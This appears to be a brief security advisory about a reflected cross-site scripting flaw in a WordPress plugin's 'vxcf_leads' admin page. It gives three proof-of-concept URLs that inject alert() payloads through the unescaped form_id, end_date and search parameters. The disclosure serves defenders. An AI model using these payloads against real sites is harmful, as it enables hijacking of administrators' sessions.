The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
https://example.com/wp-admin/admin.php?page=vxcf_leads&form;_id=cf_5e1kpc"+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)%2F%2F+ne97l&status;&tab;=entries&search;&order;=desc&orderby;=fir+ https://example.com/wp-admin/admin.php?page=vxcf_leads&form;_id=cf_5&status;=&tab;=entries&search;=&order;=asc&orderby;=file-438&field;=&time;=&start;_date=&end;_date=onobw"><script>alert(1)<%2Fscript>z2u4g https://example.com/wp-admin/admin.php?page=vxcf_leads&form;_id=cf_5&status;=&tab;=entries&search;=e67x3"onmouseover%3D"alert(1)"style%3D"position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B"oakfc&order;=asc&orderby;=file-438&field;=&time;=&start;_date=&end;_date=